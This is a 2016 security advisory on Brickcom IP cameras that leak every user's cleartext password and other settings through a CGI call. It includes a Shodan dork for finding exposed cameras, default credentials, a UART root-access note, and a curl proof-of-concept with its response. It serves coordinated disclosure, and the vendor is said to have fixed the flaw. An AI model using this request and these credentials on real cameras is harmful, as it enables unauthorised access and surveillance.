117 lines
No EOL
2.7 KiB
Text
117 lines
No EOL
2.7 KiB
Text
1. Advisory Information
|
|
========================================
|
|
Title:
|
|
|
|
Brickcom IP-Camera Remote Credentials and Settings Disclosure
|
|
|
|
|
|
Vendor Homepage:
|
|
|
|
http://www.brickcom.com
|
|
|
|
Tested on Camera types:
|
|
|
|
WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af
|
|
|
|
|
|
Remotely Exploitable:
|
|
|
|
Yes
|
|
|
|
Vulnerability:
|
|
|
|
Username / Password / Settings Disclosure (Critical)
|
|
|
|
Shodan Dork:
|
|
|
|
title:"Brickcom"
|
|
|
|
|
|
Date:
|
|
|
|
14/12/2016
|
|
|
|
Authors:
|
|
|
|
Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar)
|
|
|
|
Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio-
|
|
lizaso-9ab73359)
|
|
Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston-
|
|
emanuel-rivadero-858b9ba)
|
|
|
|
|
|
2. CREDIT
|
|
========================================
|
|
This vulnerability was identified during penetration test and Research by
|
|
Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero.
|
|
|
|
|
|
3. Description
|
|
========================================
|
|
Brickom Cameras allow a low-privilege user to disclose every configuration
|
|
in the NVRAM, including credentials in clear text, remotely by making a
|
|
simple requests. This vulnerability, coupled with the fact that there are
|
|
two default users with known passwords which are rarely modified, allows an
|
|
attacker to disclose the admin password and latter every config.
|
|
|
|
The most Critical API call is users.cgi?action=getUsers, which provides
|
|
every user credential. Many other API calls to get information for the WIFI
|
|
password or FTP credentials, even the whole configuration, are affected
|
|
depending on the camera model.
|
|
|
|
On the hardware side, the UART console of some models (example: WCB-040Af,
|
|
with baudrate 38400) is exposed in the PCB and after soldering the
|
|
corresponding pins and connecting, the resulting shell has root access. A
|
|
simple NVSHOW command will list every config available in clear text,
|
|
including credentials.
|
|
|
|
|
|
4. Proof-of-Concept:
|
|
========================================
|
|
Using the following GET request:
|
|
|
|
curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v
|
|
|
|
Request:
|
|
----------
|
|
> GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1
|
|
> Authorization: Basic <BASE64 user:pass>
|
|
> User-Agent: curl/7.35.0
|
|
> Host: <IP>:<PORT>
|
|
> Accept: */*
|
|
>
|
|
|
|
|
|
Response:
|
|
----------
|
|
< HTTP/1.1 200 Ok
|
|
< Server: mini_httpd
|
|
< Cache-Control: no-cache
|
|
< Pragma: no-cache
|
|
< Expires: 0
|
|
< Content-Type: text/html
|
|
< Connection: close
|
|
<
|
|
size=3
|
|
User1.index=0
|
|
User1.username=admin
|
|
User1.password=admin
|
|
User1.privilege=1
|
|
|
|
User2.index=1
|
|
User2.username=viewer
|
|
User2.password=viewer
|
|
User2.privilege=0
|
|
|
|
User3.index=3
|
|
User3.username=rviewer
|
|
User3.password=rviewer
|
|
User3.privilege=2
|
|
|
|
5. SOLUTION
|
|
========================================
|
|
The vendor has been contacted and the firmware was updated. See disclosure
|
|
in:
|
|
|
|
https://www.brickcom.com/news/productCERT_security_advisorie.php |